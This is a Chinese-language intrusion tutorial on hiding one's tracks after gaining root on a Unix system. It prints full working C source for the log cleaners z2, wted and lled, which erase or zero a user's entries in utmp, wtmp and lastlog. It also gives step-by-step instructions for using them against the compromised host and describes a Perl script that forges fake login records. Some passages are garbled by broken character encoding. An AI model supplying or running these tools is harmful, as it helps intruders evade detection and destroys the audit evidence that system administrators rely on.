进入系统后如何隐藏自己?
/ns/cn/jc/data/20020804033136.htm
进入系统后如何隐藏自己?
网络上有很多不同的日志清除程序,其中最好的是zap2。我编译后称为z2
在你获得root的访问权后立即运行z2这个程序。这个程序执行的非常快。
你可以使用finger @host.xxx来查看当前有说锹剂耍�仔细观察一下root或admin的idle time(空闲时间)
来猜测他们是否离开主机了。
Login, ?ú????oóá¢?′ê?è?wà′2é?′idle timeoí???úóD?????á??£ ????ó?"w"2é?′??í3oí??ê?è?ê1
×??o3é?aroot???üá?ê?2??üí?ê±??DD???£ò?????????á?root??・??ê訣?á¢?′ê?è? ./z2 ??????
??í3?ùó???ó??§???£
现在你比刚才就安全多了。现在再用"w"或"who"命令来查看一下,你已静换岜�utmp记录了。如果你要使
用 ftp或其它的一些命令你可能就会用到我在本章中提供的另外两个程序 wted 和 lled。
我们先来完成z2这个程序。你必须了解每个文件在你入侵的系统中的位置以便修改z2.c,使其包含这些
文件的正确路径。
下面是在文件头部的需要你修改的部分。
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
在有些系统中应该是:
#define WTMP_NAME "/var/adm/wtmp"
#define UTMP_NAME "/var/adm/utmp"
#define LASTLOG_NAME "/var/adm/lastlog"
但你应该自己查看一下这些文件存放在你要入侵的系统的什么位置。/var/log目录也是很可能的一个路径。
修改好正确的文件路径后,编译这个文件,现在你登录之后运行z2,你就已比较安全了。
这里是c程序:
z2.c
--------------------------- cut here
#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
--------------------------- cut here
--------------------------------------------------------------------------------
其它脚本程序
我们开始本章的另一部分。我们假设你登录并执行了z2,你需要进行ftp来抓一个文件(记住,象第一
章所说的,不要ftp或telent出这个入侵的主机)。好了,你ftp进入系统抓取几个文件,或登录到系统
的其它帐户中,那现在你就要用到wted程序了。 wted程序允许你编�wtmp日志来清除你ftp留下的记录。
你也可能要用到lled (编�lastlog日志).
你在修改日志的路径并编译wted程序后,输入 ./wted将会出现下面的菜单。
[8:25pm][/home/compile]wted
Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
-h This help 帮助
-f Use FILE instead of default 所使用的非默认文件
-a Show all entries found 显示所有的记录
-u Show all entries for USER 显示USER的所有记录
-b Show NULL entries 显示空记录
-e Erase USER completely 完全清除某用户的记录
-c Erase all connections containing HOST 清除从某主机来的所有记录
-z Show ZAP'd entries ??ê?ó?ZAP′|àí1y??????
-x Attempt to remove ZAP'd entries completely é?3yó?ZAP′|àí1y??????
如果你ftp使用的用户名为 tsmith,你应这样使用 wted -x -e tsmith
这个程序将显示用户tsmith登录的一个时间并询问你是否要删除它。在你删除你登录的记录后,记着
chmod 644 wtmp.tmp文件然后将其拷贝到日志文件的目录并覆盖岳吹奈募�。象这样�?
1. chmod 644 wtmp.tmp
2. cp wtmp.tmp /var/adm/wtmp
下面是wted程序:
重要:记着将char里面文件改成正确的路径。
wted.c
---------------------- cut here
#include
#include
#include
#include
char *file="/var/adm/wtmp";
main(argc,argv)
int argc;
char *argv[];
{
int i;
if (argc==1) usage();
for(i=1;i{
if(argv[i][0] == '-')
{
switch(argv[i][1])
{
case 'b': printents(""); break;
case 'z': printents("Z4p"); break;
case 'e': erase(argv[i+1],0); break;
case 'c': erase(0,argv[i+1]); break;
case 'f': file=argv[i+1]; break;
case 'u': printents(argv[i+1]); break;
case 'a': printents("*"); break;
case 'x': remnull(argv[i+1]); break;
default:usage();
}
}
}
}
printents(name)
char *name;
{
struct utmp utmp,*ptr;
int fp=-1;
ptr=&utmp;
if (fp=open(file,O_RDONLY))
{
while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp))
{
if ( !(strcmp(name,ptr->ut_name)) || (name=="*") ||
(!(strcmp("Z4p",name)) && (ptr->ut_time==0)))
printinfo(ptr);
}
close(fp);
}
}
printinfo(ptr)
struct utmp *ptr;
{
char tmpstr[256];
printf("%s\t",ptr->ut_name);
printf("%s\t",ptr->ut_line);
strcpy(tmpstr,ctime(&(ptr->ut_time)));
tmpstr[strlen(tmpstr)-1]='\0';
printf("%s\t",tmpstr);
printf("%s\n",ptr->ut_host);
}
erase(name,host)
char *name,*host;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct utmp utmp;
unsigned char c;
if (fp=open(file,O_RDONLY)) {
fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
if (host)
if (strstr(utmp.ut_host,host)) tot++;
else {cnt++;write(fd,&utmp,sizeof(struct utmp));}
if (name) {
if (strcmp(utmp.ut_name,name)) {cnt++;
write(fd,&utmp,sizeof(struct utmp));}
else {
if (n>0) {
n--;cnt++;
write(fd,&utmp,sizeof(struct utmp));}
else
{
printinfo(&utmp);
printf("Erase entry (y/n/f(astforward))? ");
c='a';
while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
if (c=='f') {
cnt++;
write(fd,&utmp,sizeof(struct utmp));
printf("Fast forward how many entries? ");
scanf("%d",&n);}
if (c=='n') {
cnt++;
write(fd,&utmp,sizeof(struct utmp));
}
if (c=='y') tot++;
}
} }
}
close(fp);
close(fd);
}
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
}
remnull(name)
char *name;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct utmp utmp;
if (fp=open(file,O_RDONLY)) {
fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
if (utmp.ut_time) {
cnt++;
write(fd,&utmp,sizeof(struct utmp));
}
else
tot++;
}
close(fp);
close(fd);
}
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
}
usage()
{
printf("Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
printf("\t-h\tThis help\n");
printf("\t-f\tUse FILE instead of default\n");
printf("\t-a\tShow all entries found\n");
printf("\t-u\tShow all entries for USER\n");
printf("\t-b\tShow NULL entries\n");
printf("\t-e\tErase USER completely\n");
printf("\t-c\tErase all connections containing HOST\n");
printf("\t-z\tShow ZAP'd entries\n");
printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
}
---------------------- cut here
你可能还需要清除/vat/adm/lastlog日志。
这要用到lled.c程序。编译这个文件并命名为lled.
你运行lled程序将会出现下面的菜单:
[4:04am][/home/paris/compile]lled
Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
-h This help °??ú
-f Use FILE instead of default ê1ó????¨?????t′úì?è±ê???
-a Show all entries found ??ê?è?2?????
-u Show all entries for USER ??ê????¨ó??§??è?2?????
-b Show NULL entries ??ê???????
-e Erase USER completely è?2?é?3y???¨ó??§??????
-c Erase all connections containing HOST é?3y°üo????¨?÷?ú??è?2?????
-z Show ZAP'd entries ??ê?ó?ZAP′|àí1y??????
-x Attempt to remove ZAP'd entries completely é?3yó?ZAP′|àí1y??????
你可以先用-u来看一下,很多时候你的用户名并没有记录下来,但会记录下你的主机,一般你可以这
样使用:(假设我进入系统时使用的主机名为machine.edit.com)
lled -e username -c machine.edit
如果你要查看你的主机是否记录在lastlog日志的结尾,你应输入:lled -a
使用chmod将 lastlog.tmp文件属性改为 644并象你使用上面的wted程序一样将其拷贝到日志文件的目
录中并覆盖岳吹奈募��?
重要:将lastlog路径设置为你入侵的主机中的正确路径。
下面是lled.c:
-------------------------- cut here
#include
#include
#include
#include
char *file="/var/adm/lastlog";
main(argc,argv)
int argc;
char *argv[];
{
int i;
if (argc==1) usage();
for(i=1;i{
if(argv[i][0] == '-')
{
switch(argv[i][1])
{
case 'b': printents(""); break;
case 'z': printents("Z4p"); break;
case 'e': erase(argv[i+1]); break;
case 'c': erase(0,argv[i+1]); break;
case 'f': file=argv[i+1]; break;
case 'u': printents(argv[i+1]); break;
case 'a': printents("*"); break;
case 'x': remnull(argv[i+1]); break;
default:usage();
}
}
}
}
printents(name)
char *name;
{
struct lastlog utmp,*ptr;
int fp=-1;
ptr=&utmp;
if (fp=open(file,O_RDONLY))
{
while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog))
{
if ( !(strcmp(name,ptr->ll_line)) || (name=="*") ||
(!(strcmp("Z4p",name)) && (ptr->ll_time==0)))
printinfo(ptr);
}
close(fp);
}
}
printinfo(ptr)
struct lastlog *ptr;
{
char tmpstr[256];
printf("%s\t",ptr->ll_line);
strcpy(tmpstr,ctime(&(ptr->ll_time)));
tmpstr[strlen(tmpstr)-1]='\0';
printf("%s\t",tmpstr);
printf("%s\n",ptr->ll_host);
}
erase(name,host)
char *name,*host;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct lastlog utmp;
unsigned char c;
if (fp=open(file,O_RDONLY)) {
fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
if (host)
if (strstr(utmp.ll_host,host)) tot++;
else {cnt++;write(fd,&utmp,sizeof(struct lastlog));}
if (name) {
if (strcmp(utmp.ll_line,name)) {cnt++;
write(fd,&utmp,sizeof(struct lastlog));}
else {
if (n>0) {
n--;cnt++;
write(fd,&utmp,sizeof(struct lastlog));}
else
{
printinfo(&utmp);
printf("Erase entry (y/n/f(astforward))? ");
c='a';
while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
if (c=='f') {
cnt++;
write(fd,&utmp,sizeof(struct lastlog));
printf("Fast forward how many entries? ");
scanf("%d",&n);}
if (c=='n') {
cnt++;
write(fd,&utmp,sizeof(struct lastlog));
}
if (c=='y') tot++;
}
} }
}
close(fp);
close(fd);
}
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
}
remnull(name)
char *name;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct lastlog utmp;
if (fp=open(file,O_RDONLY)) {
fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
if (utmp.ll_time) {
cnt++;
write(fd,&utmp,sizeof(struct lastlog));
}
else
tot++;
}
close(fp);
close(fd);
}
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
}
usage()
{
printf("Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
printf("\t-h\tThis help\n");
printf("\t-f\tUse FILE instead of default\n");
printf("\t-a\tShow all entries found\n");
printf("\t-u\tShow all entries for USER\n");
printf("\t-b\tShow NULL entries\n");
printf("\t-e\tErase USER completely\n");
printf("\t-c\tErase all connections containing HOST\n");
printf("\t-z\tShow ZAP'd entries\n");
printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
}
---------------------------------------------------------------- cut here
下面是个编辑tmp, wtmp和检查进程的很好的perl脚本程序。这个程序还允许你在wtmp日志中加入一行。
如果你想搞,你可以加入clinton(克林顿).whitehouse(白宫).gov logging into port ttyp3 并显示
他在系统中停留了几个小时!
使用检查功能,你可以知道是否有什么人登录到系统中而在utmp日志中又没有记录。系统管理员有时登
录后喜欢把自己隐藏起来,这个程序可以看到他们是否在线。你必须有root的权限来执行这个程序,这
个程序还需要5.003以上的版本才能运行。启动这个脚本程序后输入help。
下面是一些基本命令:
starts by loading wtmp
delete user username
delete host hostanme
write
read wtmp
delete user username
delete host hostname
write
使用help来查看其它的命令......